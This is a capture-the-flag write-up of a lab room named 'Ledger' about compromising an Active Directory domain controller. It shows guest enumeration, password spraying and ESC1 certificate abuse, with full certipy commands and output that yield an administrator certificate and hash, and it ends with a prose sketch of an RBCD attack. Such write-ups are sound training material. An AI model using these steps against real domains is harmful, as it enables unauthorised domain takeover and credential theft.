Ledger is a room where you have to compromise a domain controller. Several paths are possible to compromise the domain, one using an RCBD attack and the other a vulnerable certificate template.
Enumeration
As usual, we start by running an nmap scan to identify the services exposed on the machine. We can see straight away that the machine is a domain controller, as it has all the ports typical of a DC.
Recovery of valid accounts
Once I’d noticed that the machine was a DC, I tried to see if it was possible to retrieve information about the AD in anonymous mode or with the guest account. I saw that it was then possible that the guest account was enabled.
With this account, I was able to retrieve the list of domain user descriptions with the following command:
I then noticed that some users had their password stored in the description attribute of their account. Administrators tend to store certain sensitive information in the account descriptions they create, but they forget that these descriptions can be consulted by any user on the domain.
So, by spraying this password on all users, I manage to compromise 2 accounts:
RDP access
Once the accounts have been compromised, I map the domain by retrieving its information with the following command:
I then see that the susanna_mcknight account, can authenticate in RDP on the DC:
So, using these identifiers, I obtain RDP access to the machine and retrieve the first flag:
Vulnerable certificates
After failing to escalate privileges with RDP access, I decided to see if any certificates were vulnerable. To do this, I used certipy with the following command:
certipy-ad find -u IVY_WILLIS -p CHANGEME2023! -vulnerable -stdout -dc-ip 10.10.163.155 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates [*] Found 37 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 14 enabled certificate templates [*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA [!] Got error while trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for 'thm-LABYRINTH-CA' [*] Enumeration output: Certificate Authorities 0 CA Name : thm-LABYRINTH-CA DNS Name : labyrinth.thm.local Certificate Subject : CN=thm-LABYRINTH-CA, DC=thm, DC=local Certificate Serial Number: 5225C02DD750EDB340E984BC75F09029 Certificate Validity Start : 2023-05-12 07:26:00+00:00 Certificate Validity End : 2028-05-12 07:35:59+00:00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : THM.LOCAL\Administrators Access Rights ManageCertificates : THM.LOCAL\Administrators THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins ManageCa : THM.LOCAL\Administrators THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins Enroll : THM.LOCAL\Authenticated Users Certificate Templates 0 Template Name : ServerAuth Display Name: ServerAuth Certificate Authorities: thm-LABYRINTH-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : 16842752 Extended Key Usage : Client Authentication Server Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : THM.LOCAL\Domain Admins THM.LOCAL\Domain Computers THM.LOCAL\Enterprise Admins THM.LOCAL\Authenticated Users Object Control Permissions Owner : THM.LOCAL\Administrator Write Owner Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator Write Dacl Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator Write Property Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator [!] Vulnerabilities ESC1 : 'THM.LOCAL\Domain Computers' and 'THM.LOCAL\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication 1 Template Name : Computer2 Display Name : Computer2 Enabled : False Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : 16842752 Extended Key Usage : Server Authentication Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : THM.LOCAL\Domain Admins THM.LOCAL\Domain Computers THM.LOCAL\Enterprise Admins THM.LOCAL\Authenticated Users Object Control Permissions Owner : THM.LOCAL\Administrator Write Owner Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator Write Dacl Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator Write Property Principals : THM.LOCAL\Domain Admins THM.LOCAL\Enterprise Admins THM.LOCAL\Administrator [!] Vulnerabilities ESC1 : 'THM.LOCAL\Domain Computers' and 'THM.LOCAL\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
We can see that the ServerAuth certificate template configured with the thm-LABYRINTH-CA certification authority is vulnerable to an ESC1. This template uses all domain users to request a certificate by specifying the target account name, and is designed for Client Authentication. This means that any user can obtain a certificate that will allow them to authenticate as any account.
So, using the following command, we can retrieve a certificate from the domain administrator:
1 2 3 4 5 6 7 8
└─$ $ certipy-ad req -username '[email protected]' -password 'C[REDACTED]! -ca thm-LABYRINTH-CA -target labyrinth.thm.local -template ServerAuth -upn [email protected] [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 25 [*] Got certificate with UPN '[email protected]' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
We can then use this certificate to retrieve the hash of the password for the domain administrator account:
1 2 3 4 5 6 7 8 9
$ certipy-ad auth -pfx administrator.pfx Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:07d6[REDACTED]2322
Next, the DC can be compromised using the password hash. However, as the administrator account is in the protected Users group, you need to associate the domain name with the IP address of the DC in /etc/hosts in order to authenticate with kerberos.
Another method: RBCD attack
An analysis of the relationships between domain objects using BloodHound reveals another way of compromising the domain. In fact, the guest user has GenericWrite rights on the DC machine account, enabling us to perform a Resource Based Constrained Delegation attack.
To carry out this attack, you need to control a machine account. By default, all domain users can add 10 machine accounts on the domain. So we can use this to create a machine account that we control with the credentials we retrieved earlier.
Next, we can configure the DC machine account so that our machine account can request delegation tickets on behalf of other users to authenticate to the DC.
